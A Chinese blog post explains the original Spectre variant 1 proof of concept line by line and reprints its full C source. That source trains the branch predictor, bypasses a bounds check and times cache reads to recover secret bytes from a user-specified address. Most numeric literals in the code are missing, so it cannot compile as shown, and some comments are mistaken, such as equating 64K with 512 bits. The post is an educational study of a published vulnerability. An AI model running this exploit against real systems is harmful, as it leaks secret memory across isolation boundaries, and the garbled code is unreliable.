intel：spectre&Meltdown侧信道攻击（二）

　　上面一篇介绍了spectre&meltdown基本原理和简单的demo方案，今天继续学习一下该漏洞发现团队原始的POC：https://spectreattack.com/spectre.pdf

　　1、先展示一下运行结果，便于有个直观的认识：从打印的结果来看，成功猜测出了secret字符串的内容；

　　2、下面详细解读代码

（1）整个漏洞利用核心的两个函数：rdtscp和clflush都在这两个头文件里申明了；

#ifdef _MSC_VER

#include <intrin.h> /* for rdtscp and clflush */

#pragma optimize("gt", on)

#else

#include <x86intrin.h> /* for rdtscp and clflush */

#endif

　　（2）array1：attacker用来访问victim的数组。这里申明了160字节，但后续会用很大的数跨越数组定义时的边界限制，达到访问victim内存的目的；

unuesed1和unused2：多核cpu，每个核都有各自的L1和L2缓存；缓存以line作为基本的单元，每个cache line有64字节；unuesed1和unuesed2刚好填满2个cache line，array1占用3个cache line；

这3个数组一共占用5个不同的cache line；

　　　　 array2：secret每个单位是1byte，大小不超过255，所以“横坐标”最大256；每个cache line是64byte(最小缓存单元)，也就是512bit，所以“纵坐标”是512；

uint8_t unused1[];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.

uint8_t array1[] = { ,,,,,,,,,,,,,,, };//a shared memory space between the victim and the attacker

uint8_t unused2[];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.

uint8_t array2[ * ];//（1）secret每个单位1字节，数字大小不超过255；（2）L1的单个cache line大小64K = 512bit,这里可存储256个不同的cache line （3）shared with the attacker and victim

　　（3）这个是victim的数据，也就是需要爆破的数据；

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

　　（4）通过array1申明的长度是160，但后面某些时候会传入远大于160的数，越界访问secret的内容后存入缓存。后面即使if条件不成立，cpu回退寄存器的状态，但是的缓存仍然还在；

uint8_t temp = ; /* ensure the compiler does not remove the victim_function() at compilation time*/

// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()

void victim_function(size_t x)

{

    if (x < array1_size)//array1_size不在缓存，需要从内存读，很耗时，cpu先行执行下面的语句

    {

        temp &= array2[array1[x] * ];//array1长度是160，但x可以远超160，比如main里面定义malicious_x，这样就进入secret的存储空间

    }

}

　　（5）判断cache是否命中的阈值，这个值是多次实验得到的，不是理论推导出来的；

#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold：80是多次实验测试得到的，不是某些理论推导出来的 */

　　（6）保存缓存是否命中结果

for (i = ; i < ; i++)

        results[i] = ;

　　（7）array2每个元素如果已经在cpu的缓存，全部清除，避免影响后续计时；

for (i = ; i < ; i++)//每个元素的缓存都清零

            _mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction */

　　（8）把array1_size从cpu缓存去除；紧接着的这个空转为了确保array1_size的从cpu缓存清除；

 _mm_clflush(&array1_size);//array1_size从缓存去除

 for (volatile int z = ; z < ; z++)//ensure the flush is done, and the processor does not re-order it；volatile强制cpu从内存读取Z的值，否则这个空转可能被编译器优化

 {/* Delay (can also mfence),也可以用 mfence 替代*/

 }

　　（9）这里计算array1的偏移坐标，方法很复杂，单看代码很难理解为啥这么做，不妨先打印一些结果数据看看：

x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */

x = (x | (x >> )); /* Set x=-1 if j%6=0, else x=0 */

x = training_x ^ (x & (malicious_x ^ training_x));

　　  构造的x如下：很有规律，每6次一个轮回；每个轮回前5次的x都是7，在arry1_size的范围内，if条件是成立的；最后一个远大于arry1_size，导致if条件失效；但CPU有分支预测功能，会根据该
if分支附近或前面几个分支预测下一个if分支是否成立。前面5个分支都是成立的，会“诱导”cpu认为第6次if也成立，进而提前执行temp &= array2[array1[x] * 512]的代码，把victim的内存读到cpu
内部缓存； 然后就是执行victim_funtion（）；

j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7

j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

　　（10）victim_function执行完后，重新从array2读数据，并计时；耗时最短的说明在victim中存的就是这个；

/* Time reads. Order is lightly mixed up to prevent stride prediction */

        for (i = ; i < ; i++)

        {

            mix_i = ((i * ) + ) & ;//1、打乱读取byte的顺序，避免cpu猜测和优化byte的读取  2、&255=&FF，只保留低8bit，效果相当于%255（小于255）或%255-1（大于255）

            addr = &array2[mix_i * ];

            time1 = __rdtscp(&junk); /* READ TIMER */

            junk = *addr; /* MEMORY ACCESS TO TIME */

            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */

            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])

                results[mix_i]++; /* cache hit - add +1 to score for this value */

        }

　　（11）接下来就是排序，找出耗时最短的2个数字；

/* Locate highest & second-highest results results tallies in j/k */

        j = k = -;

        for (i = ; i < ; i++)

        {

            if (j <  || results[i] >= results[j])

            {

                k = j;

                j = i;

            }

            else if (k <  || results[i] >= results[k])

            {

                k = i;

            }

        }

        if (results[j] >= ( * results[k] + ) || (results[j] ==  && results[k] == ))

            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

    }

    results[] ^= junk; /* use junk so code above won't get optimized out*/

    value[] = (uint8_t)j;

    score[] = results[j];

    value[] = (uint8_t)k;

    score[] = results[k];

　　（12）继续看main：这个就是从arry1到目标内存的offset：

size_t malicious_x = (size_t)(secret - (char*)array1);

　　　　紧接着会传入readMemoryByte函数去探测读取内容：

printf("Reading at malicious_x = %p... ", (void*)malicious_x);

        readMemoryByte(malicious_x++, value, score);

　　（13）和https://www.cnblogs.com/theseventhson/p/13282921.html 这个POC比，这个demo多了两个功能：

　训（诱）练（导）cpu的分支预测结果，让其认为下一个if条件是成立的，提前执行if分支
不仅仅能探测secret内容，还能让用户指定需要探测的目标地址和探测的数据长度，如下：

    if (argc == )//第一个参数是目标地址，第二个参数是读取的字节数；

    {

        sscanf_s(argv[], "%p", (void**)(&malicious_x));

        malicious_x -= (size_t)array1; /* Convert input value into a pointer；*/

        sscanf_s(argv[], "%d", &len);

        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);

    }

完整的代码如下（精华都在注释了）：

#include <stdio.h>

#include <stdint.h>

#include <string.h>

#ifdef _MSC_VER

#include <intrin.h> /* for rdtscp and clflush */

#pragma optimize("gt", on)

#else

#include <x86intrin.h> /* for rdtscp and clflush */

#endif

/* sscanf_s only works in MSVC. sscanf should work with other compilers */

#ifndef _MSC_VER

#define sscanf_s sscanf

#endif

/********************************************************************

Victim code.

********************************************************************/;

unsigned int array1_size = ;

uint8_t unused1[];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.

uint8_t array1[] = { ,,,,,,,,,,,,,,, };//a shared memory space between the victim and the attacker

uint8_t unused2[];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.

uint8_t array2[ * ];//（1）secret每个单位1字节，数字大小不超过255；（2）L3的单个cache line大小64K = 512bit,这里可存储256个不同的cache line （3）shared with the attacker and victim

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

uint8_t temp = ; /* ensure the compiler does not remove the victim_function() at compilation time*/

// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()

void victim_function(size_t x)

{

    if (x < array1_size)//array1_size不在缓存，需要从内存读，很耗时，cpu先行执行下面的语句

    {

        temp &= array2[array1[x] * ];//array1长度是160，但x可以远超160，比如main里面定义malicious_x，这样就进入secret的存储空间

    }

}

/********************************************************************

Analysis code

********************************************************************/

#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold：80是多次实验测试得到的，不是某些理论推导出来的 */

/* Report best guess in value[0] and runner-up in value[1] */

void readMemoryByte(size_t malicious_x, uint8_t value[], int score[])

{

    static int results[];//内存单元读取的时间

    int tries, i, j, k, mix_i;

    unsigned int junk = ;

    size_t training_x, x;

    register uint64_t time1, time2;

    volatile uint8_t* addr;

    for (i = ; i < ; i++)

        results[i] = ;

    for (tries = ; tries > ; tries--)

    {

        /* Flush array2[256*(0..255)] from cache */

        for (i = ; i < ; i++)//每个元素的缓存都清零

            _mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */

        training_x = tries % array1_size;//training_x = 0~15

        for (j = ; j >= ; j--)

        {

            _mm_clflush(&array1_size);//array1_size从缓存去除

            for (volatile int z = ; z < ; z++)//ensure the flush is done, and the processor does not re-order it；volatile强制cpu从内存读取Z的值，否则这个空转可能被编译器优化

            {/* Delay (can also mfence),也可以用 mfence 替代*/

            }

            /*每循环6次，其中5次产生较小的x，让if条件成立；第6次产生超大、让if不成立的x，但由于前5次的x都成立，cpu还是会预先执行if分支。前面5次小x就是用来训练cpu分支预测的，以达到第6次“欺骗”的目的*/

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */

            /* Avoid jumps in case those tip off the branch predictor */

            x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */

            x = (x | (x >> )); /* Set x=-1 if j%6=0, else x=0 */

            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */

            victim_function(x);//x是相对arry1的偏移，可以深入secret数组探查；

        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */

        for (i = ; i < ; i++)

        {

            mix_i = ((i * ) + ) & ;//1、打乱读取byte的顺序，避免cpu猜测和优化byte的读取  2、&255=&FF，只保留低8bit，效果相当于%255（小于255）或%255-1（大于255）

            addr = &array2[mix_i * ];

            time1 = __rdtscp(&junk); /* READ TIMER */

            junk = *addr; /* MEMORY ACCESS TO TIME */

            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */

            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])

                results[mix_i]++; /* cache hit - add +1 to score for this value */

        }

        /* Locate highest & second-highest results results tallies in j/k */

        j = k = -;

        for (i = ; i < ; i++)

        {

            if (j <  || results[i] >= results[j])

            {

                k = j;

                j = i;

            }

            else if (k <  || results[i] >= results[k])

            {

                k = i;

            }

        }

        if (results[j] >= ( * results[k] + ) || (results[j] ==  && results[k] == ))

            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

    }

    results[] ^= junk; /* use junk so code above won't get optimized out*/

    value[] = (uint8_t)j;

    score[] = results[j];

    value[] = (uint8_t)k;

    score[] = results[k];

}

int main(int argc, const char** argv)

{

    printf("Putting '%s' in memory, address %p\n", secret, (void*)(secret));

    size_t malicious_x = (size_t)(secret - (char*)array1); /* default for malicious_x，array1到secret的距离，包括array2[256 * 512]、unused2[64]、array1[160] */

    int score[], len = strlen(secret);

    uint8_t value[];

    for (size_t i = ; i < sizeof(array2); i++)//array2[256 * 512]

        array2[i] = ; /* write to array2 so in RAM not copy-on-write zero pages */

    if (argc == )//第一个参数是目标地址，第二个参数是读取的字节数；

    {

        sscanf_s(argv[], "%p", (void**)(&malicious_x));

        malicious_x -= (size_t)array1; /* Convert input value into a pointer；*/

        sscanf_s(argv[], "%d", &len);

        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);

    }

    printf("Reading %d bytes:\n", len);

    while (--len >= )

    {

        printf("Reading at malicious_x = %p... ", (void*)malicious_x);

        readMemoryByte(malicious_x++, value, score);

        printf("%s: ", (score[] >=  * score[] ? "Success" : "Unclear"));

        printf("0x%02X='%c' score=%d ", value[],

            (value[] >  && value[] <  ? value[] : '?'), score[]);

        if (score[] > )

            printf("(second best: 0x%02X='%c' score=%d)", value[],

                (value[] >  && value[] <  ? value[] : '?'),

                score[]);

        printf("\n");

    }

#ifdef _MSC_VER

    printf("Press ENTER to exit\n");

    getchar();    /* Pause Windows console */

#endif

    return ();

}

参考：https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre 代码解读

https://bbs.pediy.com/thread-254288.htm https://xz.aliyun.com/t/6332 跨进程泄露敏感信息

https://bbs.pediy.com/thread-256190.htm Intel处理器L3 Cache侧信道分析研究

intel：spectre&Meltdown侧信道攻击（二）的更多相关文章

intel：spectre&Meltdown侧信道攻击（一）
只要平时对安全领域感兴趣的读者肯定都听过spectre&Meltdown侧信道攻击,今天简单介绍一下这种攻击的原理( https://www.bilibili.com/video/av1814 ...
intel：spectre&Meltdown侧信道攻击（三）—— raw hammer
今天介绍raw hammer攻击的原理:这次有点“标题党”了.事实上,raw hammer是基于DRAM内存的攻击:所以理论上,只要是用了DRAM内存的设备,不论是什么cpu(intel.amd,或则 ...
intel：spectre&Meltdown侧信道攻击（四）—— cache mapping
前面简单介绍了row hammer攻击的原理和方法,为了更好理解这种底层硬件类攻击,今天介绍一下cpu的cache mapping: 众所周知,cpu从内存读数据,最开始用的是虚拟地址,需要通过分页机 ...
intel：spectre&Meltdown侧信道攻击（五）—— DRAM address mapping
前面介绍了row hammer,理论上很完美,实际操作的时候会面临很尴尬的问题:内存存储数据最小的单位是cell(就是个电容,充电是1,放电是0),无数个横着的cell组成row,无数个竖着的cell ...
第四十三个知识点：为AES描述一些基础的（可能无效）的对抗侧信道攻击的防御
第四十三个知识点:为AES描述一些基础的(可能无效)的对抗侧信道攻击的防御原文地址:http://bristolcrypto.blogspot.com/2015/07/52-things-numbe ...
第四十五个知识点：描述一些对抗RSA侧信道攻击的基础防御方法
第四十五个知识点:描述一些对抗RSA侧信道攻击的基础防御方法原文地址:http://bristolcrypto.blogspot.com/2015/08/52-things-number-45-de ...
侧信道攻击，从喊666到入门之——Unicorn的环境构建
作者:backahasten 发表于小米安全中心微信公众号 0x00 前言 Unicorn可以模拟多种指令集的代码,在很多安全研究领域有很强大的作用,但是由于需要从头自己布置栈空间,代码段等虚拟执行环 ...
嵌入式 -- WINKHUB 边信道攻击 (NAND Glitch)
0x00 前言随着物联网IOT的飞速发展,各类嵌入式设备, 路由器安全研究也越来越火. 但因为跟以往纯软件安全研究的要求不同, 这类研究往往需要结合相应的硬件知识. 很多朋友困惑如何开始, 甚至卡在 ...
ORW-测信道攻击
做SCTF时碰到一个没看过的题型,比赛结束之后才知道是orw的一个玩法,测信道攻击.主要特点就是只给使用open,read,但是不给write,即无法把flag输出到终端.这里可以通过把flag读到栈 ...

随机推荐

django 后端分页
分页处理脚本: # -*- coding: utf-8 -*- # @Time : 2019-01-22 10:41 # @Author : 小贰 # @FileName: page.py # @fu ...
Web_php_unserialize解题思路
分析一下 __construct:当使用 new 操作符创建一个类的实例时,构造方法将会自动调用 __destuct:在销毁一个类之前执行执行 __wakeup,unserialize()` 会检查是 ...
python 之编码
本节内容编码回顾编码转换 Python的bytes类型编码回顾在备编码相关的课件时,在知乎上看到一段关于Python编码的回答这哥们的这段话说的太对了,搞Python不把编码彻底搞明白,总有 ...
Shaderlab-10chapter-立方体纹理、玻璃效果
10.1.1天空盒子 window - Lighting - skyMaterial 创建mat,shader选自带的6 side shader 确保相机选skybox 如果某个相机需要覆盖,添加sk ...
绘图和可视化知识图谱-《利用Python进行数据分析》
所有内容整理自<利用Python进行数据分析>,使用MindMaster Pro 7.3制作,emmx格式,源文件已经上传Github,需要的同学转左上角自行下载或者右击保存图片. 其他章 ...
java 两个数组相减结果
public static void main(String[] args) { String[] a = new String[] { "1", "5", & ...
Python Ethical Hacking - NETWORK_SCANNER(2)
DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...
大厂程序员教你如何学习C++（内附学习资料）
目前准备面试同学都知道,C++是百度和腾讯的主流开发语言,而java是阿里的主流开发语言. 对于初学者来说,也不用纠结究竟学习c++还是java 其实只要好好掌握好一门即可,另一门即可融会贯通因为我 ...
Spark实现wordcount的几种方式
方法一:map + reduceByKey package com.cw.bigdata.spark.wordcount import org.apache.spark.rdd.RDD import ...
简单分析 ztree 源码
为了把 SVG标注代码抽成一个库,我要学习一下 ztree 是怎么写的. 开始正文. 这只是一个很简单的版本,以后可能会详细分析... (function ($) { var settings = ...

intel：spectre&Meltdown侧信道攻击（二）

intel：spectre&Meltdown侧信道攻击（二）的更多相关文章

随机推荐

热门专题